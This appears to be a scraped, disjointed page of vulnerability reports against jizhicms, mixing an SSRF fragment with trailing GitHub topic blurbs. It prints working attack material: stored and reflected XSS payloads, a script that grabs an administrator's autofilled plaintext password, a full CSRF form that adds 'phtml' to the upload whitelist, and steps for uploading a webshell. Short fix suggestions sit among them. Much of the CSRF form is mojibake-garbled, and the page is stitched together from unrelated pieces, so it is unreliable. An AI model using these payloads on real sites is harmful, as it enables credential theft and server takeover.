After sending the corresponding PoC, the following request can be received on the server-side, which shows that the SSRF vulnerability has been successfully triggered.
version: 2.3.3
第一个发帖,极致CMS挺好用的,希望越来越好。
The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. However, the backend administrator clicking on the article preview will launch this malicious JavaScript script
When submitting, you can see that the post request sent is:
Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E
At this point, if the administrator previews the submitted article, a pop-up window will appear
At this point, it indicates that the embedded JavaScript script has been maliciously executed
I know that the entire system's cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser's "automatic password filling" function, then the attacker can construct the following JavaScript script to obtain the administrator's plaintext password:
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
<input name="cache" id="cache" type="hidden" value="" />
<select name="lang" lay-filter="lang">
<option value="">选择语言</option>
<option selected value="zh_cn">中文简体</option>
<option value="zh_cht">中文繁体</option>
</select>
<hr class="hr15">
<input name="username" placeholder="用户名" type="text" lay-verify="required" class="layui-input" >
<hr class="hr15">
<input name="password" lay-verify="required" placeholder="密码" type="password" class="layui-input">
<hr class="hr15">
<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
<hr class="hr20" >
</form>
<script>
setTimeout(function() {
const password = document.getElementsByName('password')[0].value;
alert(`the password is:${password}`);
}, 5000);
</script>
Submit the script after URL encoding
Administrator clicks on preview:
Here, the password plaintext has been pop-up displayed through the JavaScript script. If the pop-up function is modified to send the password plaintext to the attacker's server, the attacker will successfully obtain the administrator's plaintext password without the administrator's awareness
Modification suggestions:
Please filter the content of the article on the backend
A xss vulnerability was discovered in jizhicms 1.7.1
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of /index.php/Wechat/checkWeixin?signature=1&echostr=1
Vulnerability file: Home/c/WechatController.php
public function index(){
if (isset($_GET['echostr'])){
$this->checkWeixin();
}else{
$this->responseMsg();
}
} //验证微信公众号
public function checkWeixin(){
//微信会发送4个参数到我们的服务器后台 签名 时间戳 随机字符串 随机数
$signature = $_GET["signature"];
$timestamp = $_GET["timestamp"];
$nonce = $_GET["nonce"];
$echostr = $_GET["echostr"];
$token = $this->webconf['wx_login_token'];
// 1)将token、timestamp、nonce三个参数进行字典序排序
$tmpArr = array($nonce,$token,$timestamp);
sort($tmpArr,SORT_STRING);
// 2)将三个参数字符串拼接成一个字符串进行sha1加密
$str = implode($tmpArr);
$sign = sha1($str);
// 3)开发者获得加密后的字符串可与signature对比,标识该请求来源于微信
if ($sign == $signature) {
echo $echostr;
}
}
PoC:
http://example.com/index.php/Wechat/checkWeixin?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&echostr=<script>alert(1)</script>
The file upload vulnerability file address:
\app\admin\c\CommonController.php
It can be seen that uploads uses the blacklist and whitelist verification method for the suffix of uploaded files, but the blacklist lacks the restriction on the suffix phtml, which causes the file upload suffix to be bypassed
For users who have logged in to the background, you can add a phtml to the file suffix in the whitelist, and then you can upload a sentence of the suffix phtml Trojan Horse
Visible file uploaded successfully and returned to the upload path
Repair method:Blacklist phtml files
The CSRF vulnerability :
After the administrator logged in, open the following page phtml will be included in the white list, and other configuration items can also be modified
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST">
<input type="hidden" name="web_name" value="�ž�‡´CMS�»��«™�³»�»Ÿ" />
<input type="hidden" name="web_keyword" value="�ž�‡´�»��«™,cms,�¼€�cms,�…�´¹cms,cms�³»�»Ÿ,phpcms,�…�´¹�¼�¸š�»��«™,�»��«™�³»�»Ÿ,�¼�¸šcms,jizhicms,�ž�‡´cms,�»��«™cms,�»��«™�³»�»Ÿ,�ž�‡´�š�®¢,�ž�‡´blog,�†…�®¹�®¡�†�³»�»Ÿ" />
<input type="hidden" name="web_desc" value="�ž�‡´CMS�˜¯�¼€��…�´¹�š„PHPCMS�½‘�«™�†…�®¹�®¡�†�³»�»Ÿ�¼Œ�— �•†�¸š�Žˆ�ƒ�¼Œ�®€�•�˜“�”¨�¼Œ��¾›�¸°�¯Œ�š„�’�»¶�¼Œ�¸®�‚¨�®ž�Ž°�›¶�Ÿ��¡€�­�»��¸�Œ�±»�ž‹�½‘�«™�¼ˆ�¼�¸š�«™�¼Œ�—¨�ˆ·�«™�¼Œ�¸�人�š�®¢�«™�­‰�¼‰�¼Œ�˜¯�‚¨�»��«™�š„�¥½�¸®�‰‹�€‚�ž�€Ÿ�»��«™�¼Œ�°±�€‰�ž�‡´CMS�€‚" />
<input type="hidden" name="web_copyright" value="@2020-2099" />
<input type="hidden" name="web_beian" value="�†€ICP�¤‡88888�·" />
<input type="hidden" name="web_tel" value="0666-8888888" />
<input type="hidden" name="web_tel_400" value="400-0000-000" />
<input type="hidden" name="web_qq" value="12345678" />
<input type="hidden" name="web_email" value="123456@qq.com" />
<input type="hidden" name="web_address" value="�²³�Œ—�œ�»Š�Š�¸‚�¹¿�˜³�Œ�xxx�¤§�Ž¦xx�¥¼001�·" />
<input type="hidden" name="web_logo" value="/static/cms/static/images/logo.png" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="domain" value="" />
<input type="hidden" name="mingan" value="" />
<input type="hidden" name="closeweb" value="0" />
<input type="hidden" name="closetip" value="�Š±�­‰�¼�¯¥�«™�‚¹�·²�»�¢«�®¡�†�‘˜�œ�­¢�¿�¡Œ�¼Œ�¯·�”�³»�®¡�†�‘˜�†�§£�¯¦�ƒ…�¼" />
<input type="hidden" name="web_phone" value="0" />
<input type="hidden" name="web_weixin" value="" />
<input type="hidden" name="pc_template" value="cms" />
<input type="hidden" name="wap_template" value="cms" />
<input type="hidden" name="weixin_template" value="cms" />
<input type="hidden" name="iswap" value="1" />
<input type="hidden" name="isopenhomeupload" value="1" />
<input type="hidden" name="isopenhomepower" value="0" />
<input type="hidden" name="cache_time" value="0" />
<input type="hidden" name="fileSize" value="0" />
<input type="hidden" name="fileType" value="pdf|jpg|jpeg|png|zip|rar|gzip|doc|docx|xlsx|phtml" />
<input type="hidden" name="ueditor_config" value=""fullscreen", "source","undo", "redo","bold", "italic", "underline", "fontborder", "strikethrough", "super", "removeformat", "formatmatch", "autotypeset", "blockquote", "pasteplain","forecolor", "backcolor", "insertorderedlist", "insertunorderedlist", "selectall", "cleardoc","rowspacingtop", "rowspacingbottom", "lineheight","customstyle", "paragraph", "fontfamily", "fontsize","directionalityltr", "directionalityrtl", "indent","justifyleft", "justifycenter", "justifyright", "justifyjustify","touppercase", "tolowercase","link", "unlink", "anchor", "imagenone", "imageleft", "imageright", "imagecenter","simpleupload", "insertimage", "emotion", "scrawl", "insertvideo", "music", "attachment", "map", "gmap", "insertframe", "insertcode", "webapp", "pagebreak","template", "background","horizontal", "date", "time", "spechars", "snapscreen", "wordimage","inserttable", "deletetable", "insertparagraphbeforetable", "insertrow", "deleterow", "insertcol", "deletecol", "mergecells", "mergeright", "mergedown", "splittocells", "splittorows", "splittocols", "charts","print", "preview", "searchreplace", "help", "drafts"" />
<input type="hidden" name="ueditor_user_config" value=""undo", "redo", "|","paragraph","bold","forecolor","fontfamily","fontsize", "italic", "blockquote", "insertparagraph", "justifyleft", "justifycenter", "justifyright","justifyjustify","|","indent", "insertorderedlist", "insertunorderedlist","|", "insertimage", "inserttable", "deletetable", "insertparagraphbeforetable", "insertrow", "deleterow", "insertcol", "deletecol","mergecells", "mergeright", "mergedown", "splittocells", "splittorows", "splittocols", "|","drafts", "|","fullscreen"" />
<input type="hidden" name="classtypemaxlevel" value="0" />
<input type="hidden" name="onlyuserupload" value="1" />
<input type="hidden" name="imagequlity" value="75" />
<input type="hidden" name="ispngcompress" value="0" />
<input type="hidden" name="admintpl" value="default" />
<input type="hidden" name="islevelurl" value="0" />
<input type="hidden" name="iscachepage" value="1" />
<input type="hidden" name="isautohtml" value="0" />
<input type="hidden" name="pc_html" value="/" />
<input type="hidden" name="mobile_html" value="m" />
<input type="hidden" name="autocheckmessage" value="0" />
<input type="hidden" name="autocheckcomment" value="1" />
<input type="hidden" name="iswatermark" value="0" />
<input type="hidden" name="watermark_file" value="" />
<input type="hidden" name="watermark_t" value="9" />
<input type="hidden" name="watermark_tm" value="0" />
<input type="hidden" name="admin_save_path" value="static/upload/{yyyy}/{mm}/{dd}" />
<input type="hidden" name="home_save_path" value="static/upload/{yyyy}/{mm}/{dd}" />
<input type="hidden" name="isajax" value="0" />
<input type="hidden" name="isregister" value="1" />
<input type="hidden" name="onlyinvite" value="0" />
<input type="hidden" name="release_table" value="article|product" />
<input type="hidden" name="closehomevercode" value="0" />
<input type="hidden" name="closeadminvercode" value="0" />
<input type="hidden" name="tag_table" value="article|product" />
<input type="hidden" name="isdebug" value="1" />
<input type="hidden" name="closesession" value="0" />
<input type="hidden" name="messageyzm" value="1" />
<input type="hidden" name="homerelease" value="1" />
<input type="hidden" name="hideclasspath" value="0" />
<input type="hidden" name="hidetitleonliy" value="article-title|product-title" />
<input type="hidden" name="cachefilenum" value="100" />
<input type="hidden" name="search_table" value="article|product" />
<input type="hidden" name="search_words" value="title" />
<input type="hidden" name="search_words_muti" value="title" />
<input type="hidden" name="search_table_muti" value="article|product" />
<input type="hidden" name="search_fields_muti" value="id,tid,litpic,title,tags,keywords,molds,htmlurl,description,addtime,userid,member_id,hits,ownurl,target" />
<input type="hidden" name="email_server" value="smtp.163.com" />
<input type="hidden" name="email_port" value="465" />
<input type="hidden" name="shou_email" value="" />
<input type="hidden" name="send_email" value="" />
<input type="hidden" name="send_pass" value="" />
<input type="hidden" name="send_name" value="�ž�‡´�»��«™�³»�»Ÿ" />
<input type="hidden" name="tj_msg" value="�°Š�•¬�š„{xxx}�¼Œ�ˆ‘�»¬�·²�»�”¶�ˆ°�‚¨�š„�®¢�•�¼�¯·�•™�„�‚¨�š„�”��­�‚®�»¶�»¥�Ž·�¾—�œ€�–°�¶ˆ�¯�¼Œ�°¢�°¢�‚¨�¼" />
<input type="hidden" name="send_msg" value="�°Š�•¬�š„{xxx}�¼Œ�ˆ‘�»¬�·²�¡®�®¤�†�‚¨�š„�®¢�•�¼Œ�¯·�Ž3�—¥�†…�±‡�¬¾�¼Œ�€¾�œŸ�•�¸�¿�•™�¼Œ�¸�¾¿�¯·�§�°…�€‚�±‡�¬¾�®Œ�ˆ�Ž�¼Œ�ƒ¦�¯·�‘Š�Ÿ¥�®¢�œ人�‘˜�‚¨�š„�¤�˜“�´¦�·�Ž�”�½�¼Œ�³�®Œ�ˆ�¸‹�•�‰‹�»­�¼Œ�°¢�°¢�‚¨�€‚" />
<input type="hidden" name="yunfei" value="0.00" />
<input type="hidden" name="overtime" value="4" />
<input type="hidden" name="isopenemail" value="1" />
<input type="hidden" name="paytype" value="0" />
<input type="hidden" name="alipay_partner" value="" />
<input type="hidden" name="alipay_key" value="" />
<input type="hidden" name="alipay_private_key" value="" />
<input type="hidden" name="alipay_public_key" value="" />
<input type="hidden" name="wx_mchid" value="" />
<input type="hidden" name="wx_key" value="" />
<input type="hidden" name="wx_appid" value="" />
<input type="hidden" name="wx_appsecret" value="" />
<input type="hidden" name="wx_client_cert" value="" />
<input type="hidden" name="wx_client_key" value="" />
<input type="hidden" name="wx_token" value="" />
<input type="hidden" name="money_exchange" value="1" />
<input type="hidden" name="jifen_exchange" value="100" />
<input type="hidden" name="isopenjifen" value="1" />
<input type="hidden" name="isopenqianbao" value="1" />
<input type="hidden" name="isopenweixin" value="1" />
<input type="hidden" name="isopenzfb" value="1" />
<input type="hidden" name="isopendmf" value="1" />
<input type="hidden" name="wx_login_appid" value="" />
<input type="hidden" name="wx_login_appsecret" value="" />
<input type="hidden" name="wx_login_token" value="" />
<input type="hidden" name="huanying" value="�¬¢�¿Ž�…³�³¨�…¬�¼—�·~" />
<input type="hidden" name="login_award" value="1" />
<input type="hidden" name="login_award_open" value="1" />
<input type="hidden" name="release_award_open" value="1" />
<input type="hidden" name="release_award" value="1" />
<input type="hidden" name="release_max_award" value="0" />
<input type="hidden" name="collect_award_open" value="1" />
<input type="hidden" name="collect_award" value="1" />
<input type="hidden" name="collect_max_award" value="1000" />
<input type="hidden" name="likes_award_open" value="1" />
<input type="hidden" name="likes_award" value="1" />
<input type="hidden" name="likes_max_award" value="1000" />
<input type="hidden" name="comment_award_open" value="1" />
<input type="hidden" name="comment_award" value="1" />
<input type="hidden" name="comment_max_award" value="1000" />
<input type="hidden" name="follow_award_open" value="1" />
<input type="hidden" name="follow_award" value="1" />
<input type="hidden" name="follow_max_award" value="1000" />
<input type="hidden" name="invite_award_open" value="0" />
<input type="hidden" name="invite_type" value="jifen" />
<input type="hidden" name="invite_award" value="0" />
<input type="hidden" name="custom_type" value="0" />
<input type="hidden" name="custom_title" value="" />
<input type="hidden" name="custom_fields" value="" />
<input type="hidden" name="custom_ctype" value="1" />
<input type="hidden" name="custom_tips" value="" />
<input type="hidden" name="custom_config" value="" />
<input type="hidden" name="custom_new_title" value="" />
<input type="hidden" name="custom_new_fields" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.